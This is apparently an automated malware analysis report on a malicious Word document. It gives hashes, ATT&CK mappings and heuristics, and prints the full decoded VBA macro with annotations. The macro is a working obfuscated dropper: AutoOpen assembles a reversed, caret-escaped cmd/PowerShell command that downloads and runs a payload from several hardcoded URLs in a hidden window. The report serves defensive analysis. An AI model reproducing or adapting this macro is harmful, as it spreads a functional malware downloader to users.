Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ab209e9e31d8f552…

MALICIOUS

Office (OLE)

70.5 KB Created: 2018-10-01 03:32:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: a62132073d6f52f1b7ab377bfdb9fb94 SHA-1: 078d0186ab75b2e39e31e0818eceea3f93bd651a SHA-256: ab209e9e31d8f552fc7518aa916a0bcf1906d477fc314c70a227993b69350a24
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening the document. The macro attempts to construct and execute a command that downloads a second-stage payload from a hardcoded URL. The presence of the Shell() call and the ClamAV detection strongly indicate malicious intent.

Heuristics 6

  • ClamAV: Doc.Malware.00536d-6703105-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.00536d-6703105-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of a legacy Word macro execution surface; by itself it does not attribute the sample to a downloader or to a parser CVE.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3963 bytes
SHA-256: 284e782ef74c3b3b11d28ce9a9f9b7a9768ae2c6e432cdd6e459a11dad284c1c
Preview script
First 1,000 lines of the extracted script
' Module header of the carved VBA project (olevba output). The VB_Name is a
' random-looking identifier, and VB_Base = "1Normal.ThisDocument" suggests this
' is the document class module — the natural home for the AutoOpen entry point
' that follows. No Option Explicit appears anywhere in this listing, which is
' what lets the undeclared names used below evaluate as Empty.
Attribute VB_Name = "HswWLUQCWVZf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Entry point. Word runs AutoOpen automatically once macros are enabled, so the
' only user action needed is opening the document (the report's T1059.005 /
' T1204.002 findings and the OLE_VBA_AUTOOPEN heuristic refer to this Sub).
'
' Every If/End If block in this Sub tests names (ClRuVP, wbbjH, azijw, ...) that
' are never assigned anywhere in this listing and assigns names (BmIkY, IsADiC,
' ...) that are never read. They look like junk/padding inserted to break
' signatures and bury the single operative statement; they have no effect on
' the command that is built.
Sub AutoOpen()
   If ClRuVP Eqv 6 Then

BmIkY = "mqow"
End If
   If wbbjH Xor YZrpk Then

IsADiC = "MXqM"
End If
   If azijw And YsiGz Then

MzRzDQ = "H"
End If
   If sSLpZl <= MSFwM Then

aKNOX = "anNYOKzBk"
End If
   If DHskw Or 5 Then

hiFPH = "hH"
End If
   If EYYcIq And 13 Then

bKvIwP = "Y"
End If
' The one statement that matters: assembles a command line and passes it to
' JhzvaaqadHXE (defined further down in this listing), which hands it to Shell#.
' KeyString(...) appears to be Word's KeyString (key code -> key name); with the
' undefined names evaluating as Empty (0) the arguments reduce to 15+4+48 = 67
' and 17+5+55 = 77, presumably yielding the "c" and "m" that precede the
' "d /V/C" at the start of GjznOEH, i.e. "cmd /V/C" — TODO confirm with a live
' decode. ZwIrj, JLiHvinQ, JJKXiv and RHfSsNV are undefined here and contribute
' empty strings; GjznOEH, MNuimBbhiT and iPuBlGJwWX return the three obfuscated
' fragments of the cmd.exe command line (see those Functions).
JhzvaaqadHXE (KeyString(luuhbhFO + NGljtnZ + 15 + 4 + 48 + hIRww + Jzcmi) + ZwIrj + JLiHvinQ + KeyString(OBFNh + vbWXHmkA + 17 + 5 + 55 + Lkkvq + YzmpDb) + GjznOEH + MNuimBbhiT + iPuBlGJwWX + JJKXiv + RHfSsNV)
   If iSIvfB Xor lWfpjF Then

tFsowZ = "h"
End If
   If pCZRE <= ccwQjz Then

jOvpoO = "mwl"
End If
   If EJnSk <= zbFGdb Then

jtCNi = "RvIJaDjPTGQs"
End If
   If EtIKLQ Eqv 13 Then

iuwiZ = "QcdqnDJCbR"
End If
End Sub


' Second module: holds the three Functions that return the obfuscated command-line
' fragments concatenated by AutoOpen.
Attribute VB_Name = "HATpKNZjVsdl"
' Returns the first fragment of the cmd.exe command line.
' It begins with "d /V/C" — the tail of "cmd /V/C" once AutoOpen's "cm" prefix
' is prepended (/V turns on delayed !var! expansion, which the decoder loop in
' iPuBlGJwWX depends on). The "" "" sequence is an escaped literal double quote
' that opens the quoted command. What follows is a caret-sprinkled
' "set BJ1=" assignment: cmd.exe strips the ^ escapes before parsing, and the
' characters that remain are a reversed PowerShell one-liner — for example
' "^m^e^t^I-^e^k^ovn^I" reads "Invoke-Item" backwards and
' "^e^l^i^F^d^a^o^ln^w^o^D" reads "DownloadFile" backwards.
' The If blocks after the assignment are inert padding (see AutoOpen).
Function GjznOEH()
zjKCKiMiU = "d /V/C" + """" + "^s^e^t ^B^J^" + "1=^ ^ ^ ^ ^ ^ ^ ^" + " ^ ^ ^ ^ ^ ^ ^ ^ ^"
czJNL = " ^}^}{^hc^t" + "^ac}^;^k^a^er^b^;^F" + "^M^K^$^ ^m^e^" + "t^I-^e^k^ovn^I^"
sskLwGilf = ";)^F^M^K^$^ ,E^A" + "^H^$(^e^l^i^F^" + "d^a^o^ln^w^o^" + "D^.^qn^K^$^{^yr" + "t^{)h^b^i^$^"
pmfSAziCsrR = " n^i^ ^E^A^H^$(^hc^a" + "^er^of^;^'^e^x^e" + "^.^'^+^I^F^t^$+^'^" + "\^'^+ci^l^b^u^p^" + ":vn^e^$^=^F^M^K^$"
VnFrvQVwm = ";^'^2^9^9^'^ " + "^=^ I^F^t^" + "$^;)^'^@^'(^"
EEzaDnVfPpU = "t^i^l^p^S^.'^" + "9^UR^s^FR^I" + "5^y^S/^moc.^"
' Assembly order of the fragments; the function's return value is this string.
GjznOEH = zjKCKiMiU + czJNL + sskLwGilf + pmfSAziCsrR + VnFrvQVwm + EEzaDnVfPpU
   If FTsfQl <= 12 Then

mraSw = "f"
End If
   If mbvWn Or 16 Then

XXzRj = "fBn"
End If
End Function
' Returns the middle fragment of the command line: the reversed, caret-obfuscated
' download URL list plus the WebClient setup. Pieces such as "^ir^k//:^p^t^t^h^@"
' contain "http://" backwards with "@" as a separator, i.e. several URLs joined
' by "@" (the ".Split('@')" in GjznOEH's reversed text is how they are split
' again). "^;^tn^ei^lC^b^e^W^.^t^eN^ ^tc^e^j^b^o^-^wen" is "new-object
' Net.WebClient" backwards. Recovering the exact URLs means reversing and
' de-careting the five string constants below; each recovered host should be
' treated as a network IoC for this sample. The If blocks interleaved between
' the assignments are inert padding (see AutoOpen).
Function MNuimBbhiT()
khbqAZTBsd = "w^o^lra^mna^i^t^s" + "^ir^k//:^p^t^t" + "^h^@R^6^d^1^Yc^x^K/" + "cc^.^tn^ec^s^er^" + "o^u^l^f//^:p" + "^t^t^h^@^P^2^uS"
If vhEZzm <> YUSwf Then

wfDwr = "j"
End If
   If jptZG Xor oiYklS Then

PRiuo = "tlWq"
End If
   If LATFq And 7 Then

PaNwTo = "GjI"
End If
   If RuAzTw = qipoio Then

QZWDGr = "VIuEzMUnZ"
End If
djzPjTOihW = "^Bv^Tc^1/r^b" + "^.^m^oc^.v^e^d" + "n^o^i^t^o^m//^"
If CSZVO Eqv UTAQZm Then

JdYlkf = "k"
End If
iRQlUFuQCn = ":^p^t^t^h^@^z^q^F" + "v^s^q^Oc^a^B/" + "^m^oc^.^a^dn^os^" + "i^d^a^m//^:" + "^p^t^t^h^@XR^" + "l^A^f^B^I/^m^oc.^"
If jvBool = zWnOVM Then

CzHDmU = "FhhcJ"
End If
   If GsUmRC = WzOmY Then

EHWlXu = "iI"
End If
uXLVQfVNzA = "i^j^ol^o^y" + "i^b^or^k^i^m^a" + "d^ig//^:^p"
If iWBRiO = 5 Then

LfUTq = "iQz"
End If
   If pEwWf <> VBUhN Then

nBDpmK = "V"
End If
   If hwmWYk And DdsqwN Then

MrabUO = "GhICt"
End If
aRICL = "^t^th^'^=^h^b^i^$" + "^;^tn^ei^lC^b^e^W^" + ".^t^eN^ ^tc^e^j^b^o" + "^-^wen^=^q" + "n^K^$^ ^l^l^e"
' Assembly order of the fragments; the function's return value is this string.
MNuimBbhiT = khbqAZTBsd + djzPjTOihW + iRQlUFuQCn + uXLVQfVNzA + aRICL
   If iTfUm Xor ITEVpD Then

jSiDj = "VFnWloTfM"
End If
   If VYmdY < zLIzRh Then

lbVjHb = "pIoiSF"
End If
   If LSMkh > 1 Then

SwurcI = "LR"
End If
End Function
' Returns the last fragment of the command line. "^h^sr^e^w^o^p" is "powershell"
' backwards — the end of the BJ1 value started in GjznOEH — followed by the
' decoder, which is plain batch once the carets are stripped:
'   for /L %F in (380,-1,0) do set LyG=!LyG!!BJ1:~%F,1!
'       walks BJ1 from index 380 down to 0, appending one character per
'       iteration, i.e. builds LyG as the reverse of BJ1 (needs /V delayed
'       expansion for the !...! references);
'   if %F lss 1 call %LyG:~5%
'       on the final iteration runs LyG minus its first 5 characters.
' Net effect: cmd.exe reverses the obfuscated blob and executes the resulting
' powershell command line. For detection, the process chain this produces is
' WINWORD.EXE -> cmd.exe (command line containing /V and dense ^ escapes) ->
' powershell.exe. The trailing "" "" closes the quoted command opened in GjznOEH.
' The If block at the end is inert padding (see AutoOpen).
Function iPuBlGJwWX()
rZrTMGHqXh = "^h^sr^e^w^o^p" + "&&^f^or /^L %^F " + "^in (3^8^0" + "^,^-^1^,^0)^" + "d^o ^s^e^t" + " ^L^y^G=!^L^y^G!!^B"
PicHAcPtZ = "^J^1:~%^F,1!&&^i^" + "f %^F ^l^s^" + "s ^1 c^a^l^l %^" + "L^y^G:^~^5%" + """"
iPuBlGJwWX = rZrTMGHqXh + PicHAcPtZ
   If qKblG > Jqwtf Then

DvjwJ = "rbzdL"
End If
End Function


' Third module: holds the Function that actually spawns the process.
Attribute VB_Name = "SHUhZOwXOw"
' Executes the command line assembled by AutoOpen.
'   YKIBwVS - the full command string (expected to begin "cmd /V/C", see AutoOpen).
' No return value is ever assigned; the function exists for its side effect.
' The If blocks before and after the Shell# line are inert padding (see AutoOpen).
Function JhzvaaqadHXE(YKIBwVS As String)
' A constant written as 16425839 - 16425839, i.e. 0. Passed as Shell's
' WindowStyle argument, 0 is vbHide: the spawned process gets no visible window.
Const AqorwRr = 16425839 - 16425839
   If qiUMt <= ScuMw Then

ADPZd = "a"
End If
   If BbdUo Xor MqPja Then

DUPia = "foiRI"
End If
   If Wtjpn And UYjjTf Then

wjrdVd = "kII"
End If
' The only statement with an effect: runs YKIBwVS hidden. The "#" is a
' type-declaration suffix on the Shell name and does not change which function
' is called (it also defeats a naive "Shell(" string match) — confirm if in doubt.
' This is the OLE_VBA_SHELL finding in the report above.
Shell# YKIBwVS, AqorwRr
   If mjNkOM <= TEJcU Then

ardwDG = "GJjuf"
End If
   If MQOEO Xor EEUkoX Then

XwENc = "aEFjiA"
End If
   If UHjjE >= kRUHzZ Then

rDuul = "tz"
End If
End Function